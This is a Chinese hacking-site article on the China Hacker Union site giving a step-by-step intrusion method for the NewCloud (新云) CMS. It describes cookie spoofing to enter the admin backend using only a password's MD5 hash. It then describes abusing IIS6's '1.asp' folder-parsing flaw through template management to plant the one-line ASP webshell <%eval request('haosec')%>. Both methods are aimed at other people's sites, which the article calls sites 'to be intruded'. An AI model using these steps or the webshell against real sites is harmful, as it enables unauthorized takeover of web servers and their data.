最大最专业黑客组织 -- 黑客联盟 -- Hacker Union For China -- www.ChinaHacker.Com -- 黑色矩防火墙 -- 专业防御DDOS攻击

联盟首页 技术文章 软件下载 DDOS防御 核心申请 分站申请 邮局系统 技术咨询 区域分化 广告合作 代理服务 版本V6.22

-------- Welcome To Hacker Union For China !Thank You For Your Support !--------
================ 维护祖国尊严 爱我中华 强我中华 耀我中华 ================
中国黑客联盟>>网络信息  |   中国黑客联盟>>系统知识  |  
中国黑客联盟>>网络信息>>漏洞入侵>>新云网站管理系统后台拿WEBSHELL

新云网站管理系统后台拿WEBSHELL


影响范围:全ACCESS版本,SQL未测试。

新云网站管理系统是现在比较流行的cms系统,功能也算强大,但由于ASP语言本身的安全环境不是很好,所以漏洞多多也不新鲜,我这里一共发现了两个安全隐患,应该说是致命的。

一、COOKIES欺骗,进入后台。
大家都知道,一般的后台密码都是MD5加密的,如果管理员把密码设置的复杂一点,即使你在聪明,恐怕也要用个一年半载才能破解出来,但其实,新云的后台只要知道MD5的值就可以进入,这也是一般的ASP程序经常有的情况。

方法就是在本地搭设一个相同版本的新云站点,然后用COOKIES修改浏览器,先进入本地的新云管理后台,然后修改COOKIES ,将账号、密码、网址都改成待入侵网站的就可以了,一回车,你就会发现我们已经成功的进入了待入侵网站的后台。

这个方法比较简单,也常见,我就不多说了,我的是下面的后台如何取得WEBSHELL.

二、后台拿WEBSHELL(系统2003)
我们点击模板管理,新建一个模板,名称随便,但注意模板路径一定要是"1.asp"这类,因为2003会把1.asp解析成为文件夹,新建完成之后我们会看到网站根目录下面会生成一个1.asp的文件夹,这时我们点击编辑CSS样式,我们将整个代码都用<%eval request("haosec")%>替换掉,然后点击保存。

这时你会发现,在1.asp文件夹下面会新建一个文件style.css,里面的内容就是一句话了。我们将http://my/1.asp/style.css用LACKER2一句话进行连接,可以看到已经连接成功。

这样我们就得到了一个WEBSHELL。

其实漏洞形成的原因无非就是过滤不严密造成的,使用新云的朋友一定要保护好数据库和后台,否则你就惨喽。

原作者:沉默之心
来 源:不详
共有13692位读者阅读过此文

□- 本周热门文章
1.Datalogic AV7000 L...[362286]
2.Delta Controls ent...[145857]
3.黑客入侵实例之轻装入侵个人主页空间 [132334]
4.Autodesk AutoCAD远程...[111829]
5.浅析如何控制内网机器[70041]
6.Yokogawa多个产品栈缓冲区溢出...[69515]
7.破解“隐身”的几大绝招[58538]

关于我们 | 分站申请 | 成员申请 | 技术论坛 | 站内导航 | 合作伙伴 | 联系我们

Copyrights © 2002 - 2019 www.ChinaHacker.com All Rights Reserved

版权所有   中 国 黑 客 联 盟

(Hacker Union For China V 6.22)

闽ICP备05007859号